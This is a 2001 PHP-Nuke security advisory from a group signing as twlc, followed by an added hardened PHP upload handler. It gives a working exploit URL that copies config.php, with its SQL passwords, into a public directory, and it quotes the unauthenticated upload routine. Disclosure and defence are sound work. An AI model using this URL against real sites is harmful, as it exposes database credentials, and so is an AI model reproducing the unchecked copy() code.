twlc security division
24/09/2001

PHP-Nuke BUGGED.
Found by: LucisFero and supergate ./twlc

Summary

This time the bug is really dangerous... it allows you to 'cp' any file on the box... or even upload files...

Systems Affected

All versions ARE vulnerable except '5.0 RC1' (I wonder why a release candidate is OK while the final 5.2 is bugged).

Explanation

Do you need the SQL password?

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

The admin 'login' page will be prompted; just go to

http://www.server.net/images/hacked.txt

and you will see config.php, which as everyone knows contains the SQL passwords. You can even upload files... I leave you the 'fun' of finding all the ways to use it... and try NOT to be a SCRIPT KIDDIE: we wrote this advisory to help those who run PHP-Nuke and NOT TO LET YOU HAVE FUN.

Let me explain the bug... admin.php contains this routine:

    $basedir = dirname($SCRIPT_FILENAME);
    $textrows = 20;
    $textcols = 85;
    $udir = dirname($PHP_SELF);
    if(!$wdir) $wdir="/";
    if($cancel) $op="FileManager";

    if($upload) {
        copy($userfile,$basedir.$wdir.$userfile_name);
        $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
        // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
        //include("header.php");
        //GraphicAdmin($hlpfile);
        //html_header();
        //displaydir();
        $wdir2="/";
        chdir($basedir . $wdir2);
        //CloseTable();
        //include("footer.php");
        Header("Location: admin.php?op=FileManager");
        exit;
    }

which does not check whether you are logged in as admin or not... so you can use it anyway...

Solution

We erased the function... because we wanted to remove the file manager anyway, but I suggest you do the same... -to upload files use FTP-

Conclusions

Yet another bug in PHP-Nuke... this software is used by thousands of people... (we run something based on it too). I hope that this time the author will reply soon and will release a patch too!
As I said before, just don't try to be a script kiddie or we simply WON'T post this kind of advisory anymore. Probably the funny thing is that the one who first discovered the bug was LucisFero, who... 2 hours before didn't know PHP... so I (supergate) fear him and you should too.

posted at: http://www.twlc.net
article: http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com
http://www.phpnuke.org -good luck-
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System
and of course mailed to the author of PHP-Nuke

contacts (bugs, ideas, insults, cool girls... remember that trojans are directed to /dev/null):
lucisfero@twlc.net
supergate@twlc.net
http://www.twlc.net (yes we are patched)

peace out pimps. cheers to everyone.
eof
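A hardened version of the upload branch quoted in the Explanation above, added here as an example and not PHP-Nuke's own code. It keeps $basedir as in the original, assumes a hypothetical is_admin() that validates the admin session, and assumes the directories the file manager may write to are the ones listed in $allowed; it reads $_POST/$_FILES directly instead of relying on register_globals, which is what let the query string set $upload, $userfile and the other variables in the original.

```php
<?php
// Added example, not PHP-Nuke code. $basedir is the site root as in the
// original routine; is_admin() is a hypothetical admin-session check.
$basedir = dirname($_SERVER['SCRIPT_FILENAME']);

function safe_upload_path($basedir, $wdir, $name) {
    // Only the directories the file manager is meant to serve (assumption).
    $allowed = array('/images/', '/files/');
    if (!in_array($wdir, $allowed, true)) {
        return false;
    }
    // Drop any directory component the client sent, then accept only a plain
    // file name (no leading dot, so .htaccess and friends are refused).
    $name = basename($name);
    if ($name === '' || $name[0] === '.' || !preg_match('/^[A-Za-z0-9._-]+$/', $name)) {
        return false;
    }
    // Resolve the target directory and re-check that it stays under $basedir.
    $dir  = realpath($basedir . $wdir);
    $root = realpath($basedir);
    if ($dir === false || $root === false || strpos($dir . '/', $root . '/') !== 0) {
        return false;
    }
    return $dir . '/' . $name;
}

if (isset($_POST['upload'])) {
    // 1. The check the original lacks: only an authenticated admin gets here.
    if (!is_admin()) {
        header('Location: admin.php');
        exit;
    }
    // 2. copy($userfile, ...) in the original reads whatever path the client
    //    names, which is how config.php ends up in /images/. Only files the
    //    web server itself received in this request are accepted here.
    if (!isset($_FILES['userfile']) || !is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        die('no uploaded file');
    }
    $dest = safe_upload_path($basedir, $_POST['wdir'], $_FILES['userfile']['name']);
    // 3. move_uploaded_file() refuses anything that is not a real upload.
    if ($dest === false || !move_uploaded_file($_FILES['userfile']['tmp_name'], $dest)) {
        die('upload rejected');
    }
    header('Location: admin.php?op=FileManager');
    exit;
}
```

Even with these checks an admin can still upload a .php file into a web-served directory, so a site that keeps the file manager should also restrict the allowed extensions or serve the upload directories without script execution.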